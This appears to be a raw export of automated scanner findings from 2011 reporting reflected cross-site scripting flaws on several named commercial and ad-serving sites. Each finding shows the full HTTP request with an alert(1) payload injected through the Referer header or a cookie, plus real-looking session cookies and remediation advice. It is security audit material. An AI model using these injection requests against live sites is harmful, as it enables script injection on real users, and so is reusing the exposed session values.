GET /ttj?id=396985&pubclick=http://xads.zedo.com/ads2/c%3Fa%3D895737%3Bx%3D2304%3Bg%3D172%3Bc%3D305005852%2C305005852%3Bi%3D0%3Bn%3D305%3Bi%3D0%3Bu%3DjhmxpQoBADYAAET@BzgAAAAW%7E022111%3B1%3D8%3B2%3D1%3Be%3Di%3Bs%3D421%3Bg%3D172%3Bw%3D47%3Bm%3D82%3Bz%3D0.2778043581638485%3Bp%3D8%3Bf%3D1093076%3Bh%3D1093075%3Bo%3D20%3By%3D331%3Bv%3D1%3Bt%3Di%3Bk= HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=6dd58'-alert(1)-'8a44710014e Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChEI93oQChgBIAEoATD7w4vrBBD7w4vrBBgA; uuid2=4470455573253905340; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6WIpbjn!e5'S.ASR/7l([H.cpVGe8tPtQ-y5#we@ie65CB#S!9Y^vP[KF^P'%_EYX5)gWYmv-[1%xvmrNHt.[<D(7u)aj^!iH1rT^=*7C^Bjc%C9:V]:>i#xK^@g2k_woCAWF@?sM.MP<1ic[d6CGz9%wPyKtR:Oy7D34Qm3(6eds:*nw[M7fUB%t6ySwO$b4u(JNrEJOXfpGHm(!<YP8ub*=t
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Thu, 24-Feb-2011 21:50:43 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4470455573253905340; path=/; expires=Tue, 24-May-2011 21:50:43 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=ChIIr7gCEAoYASABKAEws4KW6wQQs4KW6wQYAA..; path=/; expires=Tue, 24-May-2011 21:50:43 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Wed, 23 Feb 2011 21:50:43 GMT Content-Length: 1050
The value of the Referer HTTP header is copied into an HTML comment. The payload 8177c--><script>alert(1)</script>e023ffda58 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /icons/16x16/ HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; Referer: http://www.google.com/search?hl=en&q=8177c--><script>alert(1)</script>e023ffda58
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edc49"><script>alert(1)</script>ac11e21fa42 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=edc49"><script>alert(1)</script>ac11e21fa42
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 02:27:43 GMT Server: Apache X-Powered-By: PHP/5.2.16 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/ Content-Length: 94210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=edc49"><script>alert(1)</script>ac11e21fa42" /> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f167'-alert(1)-'d2251a39e36 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /data/details/traffic_details?url=www.4shared.com HTTP/1.1 Host: www.alexa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=9f167'-alert(1)-'d2251a39e36
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbff4"><script>alert(1)</script>4ecff407bde was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.espnshop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: dbff4"><script>alert(1)</script>4ecff407bde
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 23 Feb 2011 23:12:51 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Pragma: no-cache P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: JSESSIONID=WTLvNlJTDtF21MKvb2SHJwPkRj6x8b1YBqhR05Ll4C2v1CX1gL11!-1678667533; path=/ Set-Cookie: browser_id=121983128284; expires=Saturday, 20-Feb-2021 23:12:51 GMT; path=/ Set-Cookie: browser_id=121983128284; expires=Saturday, 20-Feb-2021 23:12:51 GMT; path=/ Set-Cookie: browser_id=121983128284; expires=Saturday, 20-Feb-2021 23:12:51 GMT; path=/ Set-Cookie: browser_id=121983128284; expires=Saturday, 20-Feb-2021 23:12:51 GMT; path=/ Set-Cookie: browser_id=121983128284; expires=Saturday, 20-Feb-2021 23:12:51 GMT; path=/ Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 99408
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8122"><script>alert(1)</script>a4e893c3c6d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /family/index.jsp HTTP/1.1 Host: www.espnshop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: d8122"><script>alert(1)</script>a4e893c3c6d
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 23 Feb 2011 23:10:32 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Pragma: no-cache P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: JSESSIONID=lWYRNlTLGNR9jn9VGyyTTgTJMVLK6GvkY3pPW5srfPChNGdZ6zG8!-621544071; path=/ Set-Cookie: browser_id=121983342444; expires=Saturday, 20-Feb-2021 23:10:32 GMT; path=/ Set-Cookie: browser_id=121983342444; expires=Saturday, 20-Feb-2021 23:10:32 GMT; path=/ Set-Cookie: browser_id=121983342444; expires=Saturday, 20-Feb-2021 23:10:32 GMT; path=/ Set-Cookie: browser_id=121983342444; expires=Saturday, 20-Feb-2021 23:10:32 GMT; path=/ Set-Cookie: browser_id=121983342444; expires=Saturday, 20-Feb-2021 23:10:32 GMT; path=/ Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 99409
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98fdb</script><script>alert(1)</script>364b6f096e8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ForgotPassword HTTP/1.1 Host: www.rei.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000Vq4EAQo1i3cHWRUeAka9MaR:12c4asuqe; REI_SESSION_ID=50049694244%2CP08sIlh%2BJlQqVVN%2BLyhLNy0uPl41VX5ZMTlOUH5DX18uTU0nM1VNMzxEUCQh; __utmz=104384131.1298667930.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; REI_ANALYTICS_SESSION=opencart~%7Cmclick~%7Csl_seen~%7Cp_f_m~top%20nav%20rei%7Cprev_omni_pagename~membership%3Amain; REI_SSL_SESSION_ID=50049694244%2CP1U%2FKU5UVUdKMiJGXE4uTTBcLUgyQEEvQ0lIV0wuSlVFfjFXTDVPTyZBQCQh; mr_referredVisitor=0; mbox=check#true#1298668042|session#1298667914619-871377#1298669842|PC#1298667914619-871377.17#1299877582; s_vnum=1456347930317%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=1295673914-1-34_1-1-__1_; loggedin=0; IS3_GSV=DPL-2_TES-1298667958_PCT-1298667958_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; s_nr=1298667989949-New; s_vi=[CS]v1|26B40CBD851D0E29-4000012CA035CE9C[CE]; __utma=104384131.673842893.1298667930.1298667930.1298667930.1; rei_user_info=""; __utmc=104384131; stop_mobi=yes; __utmb=104384131.2.10.1298667930; Referer: http://www.google.com/search?hl=en&q=98fdb</script><script>alert(1)</script>364b6f096e8
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://www.rei.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMi TAIi IVDo CONo OUR DELa SAMo STP PHY PUR COM NAV INT STA PRE GOV" Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Sat, 26 Feb 2011 02:33:25 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: JSESSIONID=0000Vq4EAQo1i3cHWRUeAka9MaR:12c4asuqe:12c4b15as; Path=/ Content-Length: 78761
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f9b2</script><script>alert(1)</script>ce41757f8fb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /OrderTrackingLoginView HTTP/1.1 Host: www.rei.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000Vq4EAQo1i3cHWRUeAka9MaR:12c4asuqe; REI_SESSION_ID=50049694244%2CP08sIlh%2BJlQqVVN%2BLyhLNy0uPl41VX5ZMTlOUH5DX18uTU0nM1VNMzxEUCQh; __utmz=104384131.1298667930.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; REI_ANALYTICS_SESSION=opencart~%7Cmclick~%7Csl_seen~%7Cp_f_m~top%20nav%20rei%7Cprev_omni_pagename~membership%3Amain; REI_SSL_SESSION_ID=50049694244%2CP1U%2FKU5UVUdKMiJGXE4uTTBcLUgyQEEvQ0lIV0wuSlVFfjFXTDVPTyZBQCQh; mr_referredVisitor=0; mbox=check#true#1298668042|session#1298667914619-871377#1298669842|PC#1298667914619-871377.17#1299877582; s_vnum=1456347930317%26vn%3D1; s_invisit=true; s_cc=true; IS3_History=1295673914-1-34_1-1-__1_; loggedin=0; IS3_GSV=DPL-2_TES-1298667958_PCT-1298667958_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; s_nr=1298667989949-New; s_vi=[CS]v1|26B40CBD851D0E29-4000012CA035CE9C[CE]; __utma=104384131.673842893.1298667930.1298667930.1298667930.1; rei_user_info=""; __utmc=104384131; stop_mobi=yes; __utmb=104384131.2.10.1298667930; Referer: http://www.google.com/search?hl=en&q=9f9b2</script><script>alert(1)</script>ce41757f8fb
Response
HTTP/1.1 200 OK Server: Apache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" P3P: policyref="http://www.rei.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMi TAIi IVDo CONo OUR DELa SAMo STP PHY PUR COM NAV INT STA PRE GOV" Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Sat, 26 Feb 2011 02:33:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: JSESSIONID=0000Vq4EAQo1i3cHWRUeAka9MaR:12c4asuqe:12c4b1vd3; Path=/ Content-Length: 81914
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0a7f</script><script>alert(1)</script>194c19d5de3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3303c</script><script>alert(1)</script>112a8f16292 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6aae1"%3balert(1)//9f276e0ea99 was submitted in the cli cookie. This input was echoed as 6aae1";alert(1)//9f276e0ea99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/manta.comp/energy_resources;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;net=mt;ord=9636399718001484;ord1=980367;cmpgurl=http%253A//www.manta.com/c/mtl07lp/industrial-waste-recovery-llc? HTTP/1.1 Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cli=11e4f07c0988ac76aae1"%3balert(1)//9f276e0ea99; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; rdst12=1; dp2=1; dc=dc-sea
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 26 Feb 2011 00:19:23 GMT Connection: close Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:23 GMT Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Sat, 05-Mar-2011 00:19:23 GMT Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 26-Feb-2011 08:19:23 GMT Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:23 GMT Content-Length: 8118
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... </scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11e4f07c0988ac76aae1";alert(1)//9f276e0ea99&seg_code=noseg&ord=1298679563",true);CollectiveMedia.addPixel("http://r.nexac.com/e/getdata.xgi?dt=br&pkey=xkeii93kdn349&reppipe=,&edr=off&repequal=_&ru=http%3A%2F%2Fa.collective-media.net%2Fdatapair% ...[SNIP]...
The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 85e58<script>alert(1)</script>0dca2365492 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /getSegment.php?fpc=c428de2-12e59391fd7-2d50293c-2&purl=null&jsref= HTTP/1.1 Host: seg.sharethis.com Proxy-Connection: keep-alive Referer: http://edge.sharethis.com/share4x/index.5c108f5ecedf280ce5fe5e8db7e38332.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==85e58<script>alert(1)</script>0dca2365492
Response
HTTP/1.1 200 OK Server: nginx/0.8.47 Date: Thu, 24 Feb 2011 19:50:27 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.3 P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM" Content-Length: 1195